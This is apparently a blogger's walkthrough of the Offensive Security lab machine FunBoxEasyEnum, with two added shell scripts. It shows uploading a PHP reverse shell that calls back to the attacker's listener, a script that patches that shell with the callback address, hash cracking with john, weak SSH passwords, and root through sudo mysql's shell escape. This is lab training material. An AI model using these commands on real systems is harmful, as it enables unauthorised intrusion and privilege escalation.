Offensive Security maintains virtual machines you can VPN into and start attacking.
It's free to sign up to play, but you get kicked off after 2 hours.

You can pay $20 a month to spend all day there, learning and attacking. It's really fun and interesting.
Anyhow, this is a technical walkthrough of one called FunBoxEasyEnum.

Imagine that you're on a Kali Linux box, VPN-ed into the target network, and you scan for the remote host and find it at the 192.168 address below.

I'll share my recon script in another post, but it finds all the details about the victim computer and I do vulnerability analysis from there. Try it. I learn a lot this way.

Fast and Dirty:

  1. nmap reveals TCP/22 and 80.
  2. Dirb or gobuster reveals mini.php, a file uploader.
  3. Copy /usr/share/webshells/php/php-reverse-shell.php and edit it: set $ip to your VPN address and $port to your listener port ($port = 4444; // Your netcat listener port).
  4. Open your local netcat listener first: nc -nlvp 4444
  5. Upload php-reverse-shell.php through the uploader at http://192.168.X.X/mini.php.
  6. Execute it with curl: curl http://192.168.X.X/php-reverse-shell.php
  7. The target connects back to you and you have an unprivileged shell as www-data.
  8. Pillage /etc/passwd: it holds a hash for oracle that cracks to 'hiphop'. (Not useful, but fun.)
  9. SSH in as goat (password: goat); sudo -l shows goat can run /usr/bin/mysql as root without a password.
  10. Escalate with: sudo /usr/bin/mysql -e '\! /bin/sh'
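The template-editing step is where people lose time: a missed sed means the shell never calls back and you stare at a silent listener. Here is an added example (mine as editor, not code from the original post) that patches the Kali template and then verifies both values really changed. The template path and its two "CHANGE THIS" marker lines are the real pentestmonkey layout; the stand-in template written inside the script, the patch_revshell name and the temp file paths are constructed for the example, and 192.168.49.210 is the attacker address seen in the connect-back below.

```shell
#!/bin/sh
# Added example, not code from the original post: fill in the listener
# address and port in pentestmonkey's php-reverse-shell.php (shipped on
# Kali at /usr/share/webshells/php/php-reverse-shell.php) with sed, then
# verify the edit actually landed. The real template carries exactly:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# A constructed stand-in with those two lines is written below so this
# runs offline; on an engagement point TEMPLATE at the real file.

# patch_revshell TEMPLATE OUT IP PORT
# Copies TEMPLATE to OUT with $ip/$port replaced and returns 1 if either
# value is missing from OUT afterwards (a silently missed sed is the usual
# reason the callback never arrives).
patch_revshell() {
    template=$1; out=$2; ip=$3; port=$4
    # Anchor on the assignment statements so nothing else in the file that
    # mentions "ip" or "port" is touched; [$] is a literal dollar sign.
    sed -e "s#^[\$]ip = '[^']*';#\$ip = '${ip}';#" \
        -e "s#^[\$]port = [0-9]*;#\$port = ${port};#" \
        "$template" > "$out" || return 1
    grep -qF "\$ip = '${ip}';" "$out" || return 1
    grep -qF "\$port = ${port};" "$out" || return 1
}

TEMPLATE=$(mktemp)
OUT=$(mktemp)

# Constructed stand-in for the top of the real template (same marker lines).
cat > "$TEMPLATE" <<'EOF'
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
EOF

# 192.168.49.210 is the attacker VPN address from the connect-back line.
if patch_revshell "$TEMPLATE" "$OUT" 192.168.49.210 4444; then
    echo "patched shell written to $OUT; now: nc -nlvp 4444, upload via mini.php, then curl it"
    grep -n 'CHANGE THIS' "$OUT"
else
    echo "marker lines not found in $TEMPLATE; check the template" >&2
fi
```

The verification greps are the point: if the template ever changes its marker lines, the function fails loudly instead of handing you a shell that still dials 127.0.0.1:1234.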

The callback lands on the listener:

connect to [192.168.49.210] from (UNKNOWN) [192.168.210.132] 40648
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
12:29:57 up 18 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
funbox7

From there we must escalate privileges.

Misc:
– cat /etc/passwd, and there's a password hash for oracle sitting in it (in /etc/passwd itself, not /etc/shadow).
– # grep oracle passwd > oracle-hash.out
– # john oracle-hash.out cracks it:
hiphop (oracle)
– # id shows uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
– Sadly not a privileged account.
– Handful of users in /home: harry, sally, goat, oracle and karla.
– ls -a shows lots of hidden dot files. Inspect those.
– ls -l
drwxr-xr-x 2 goat goat 4096 Feb 16 13:25 goat
drwxr-xr-x 2 harry harry 4096 Jan 28 12:03 harry
drwxr-xr-x 2 karla karla 4096 Feb 16 13:23 karla
drwxr-xr-x 2 oracle oracle 4096 Feb 16 13:23 oracle
drwxr-xr-x 2 sally sally 4096 Jan 28 12:03 sally

– The walkthrough recommended ssh goat@192.168.X.X, and "goat" worked as the password!
– goat@funbox7:~$ id goat
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
– id on the other local users, for comparison:
uid=1002(sally) gid=1002(sally) groups=1002(sally)
uid=1001(harry) gid=1001(harry) groups=1001(harry)
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
– Nobody has uid=0 though.

goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
(root) NOPASSWD: /usr/bin/mysql
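That one rule is the whole box: the mysql client has a shell escape (\!), and sudo runs the client as root. Reading sudo -l output by eye is fine for one line, but on a real host the list is longer and the dangerous binaries hide among harmless ones. Here is an added example (mine as editor, not from the original post) that parses sudo -l output and flags commands whose basename is a known shell-escape binary, reporting whether each needs a password. The sudo_escape_check name, the ESCAPE_BINS list (a constructed subset of the usual GTFOBins suspects) and the extra vim/cat rule in the sample are assumptions; the goat rule and the Defaults lines are copied from the output above.

```shell
#!/bin/sh
# Added example, not code from the original post: triage "sudo -l" output
# the way you would on a box like this. Every rule line of the form
# "(runas) [TAG:] command[, command]" is parsed, and a command is flagged
# when its basename can hand back a shell (mysql via "\!", vim/less via
# ":!" and "!", find via -exec, and so on). The list is a constructed
# subset; extend it from GTFOBins for real use.
ESCAPE_BINS="mysql vim vi less more nano find awk perl python python3 bash sh env"

# sudo_escape_check FILE
# Prints one line per flagged rule, "<binary> (<runas>, NOPASSWD|password) <command>",
# and returns 0 if anything was flagged, 1 otherwise. A bare ALL is always flagged.
sudo_escape_check() {
    awk -v bins="$ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    # Rule lines start with the parenthesised run-as spec; Defaults and
    # header lines do not and are skipped.
    /^[ \t]*\(/ {
        runas = $0
        sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
        tag = ($0 ~ /NOPASSWD:/) ? "NOPASSWD" : "password"
        cmds = $0
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", cmds)
        # Strip any leading tags such as NOPASSWD:, SETENV:, NOEXEC:
        while (cmds ~ /^[A-Z_]+:[ \t]*/) sub(/^[A-Z_]+:[ \t]*/, "", cmds)
        m = split(cmds, c, ",[ \t]*")
        for (i = 1; i <= m; i++) {
            cmd = c[i]; sub(/^[ \t]+/, "", cmd); sub(/[ \t]+$/, "", cmd)
            if (cmd == "ALL") { print "ALL (" runas ", " tag ") " cmd; hits++; continue }
            # basename of the binary, ignoring any arguments in the rule
            base = cmd; sub(/[ \t].*/, "", base); sub(/.*\//, "", base)
            if (base in risky) { print base " (" runas ", " tag ") " cmd; hits++ }
        }
    }
    END { if (hits > 0) exit 0; exit 1 }
    ' "$1"
}

SAMPLE=$(mktemp)
# Constructed input: the goat rule from this box plus one extra
# password-protected rule (vim, cat) to show the distinction.
cat > "$SAMPLE" <<'EOF'
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/vim, /usr/bin/cat
EOF

if sudo_escape_check "$SAMPLE"; then
    echo "-> shell-escape candidates above; for mysql: sudo /usr/bin/mysql -e '\! /bin/sh'"
else
    echo "no obvious shell escapes in sudo rules"
fi
```

On the sample it prints mysql (root, NOPASSWD) and vim (root, password) and stays quiet about cat. Run it against saved sudo -l output from each user you land as; a password-protected rule is still worth noting, since a cracked hash from /etc/shadow (see the john run below) turns it into a root shell too.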

Back on Kali, john against the unshadowed passwd/shadow file (unshadowed.out) cracks four of the six hashes:

root@KaLinux:/home/loki/OSCP/17.FunBoxEasyEnum# john unshadowed.out
Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
goat (goat)
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
123456 (harry)
12345 (oracle)
iubire (sally)

(Note that oracle's shadow hash cracks to 12345, a different password from the hiphop hash left in /etc/passwd.)

Fancy: list the contents of every subdirectory, dotfiles included, a bit like the tree command:
# ls -as *

Anyhow, escalated privs with sudo /usr/bin/mysql -e '\! /bin/sh' (\! is the mysql client's shell escape, and sudo runs the client as root, so the spawned /bin/sh is root's):
# whoami
root
wow.

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.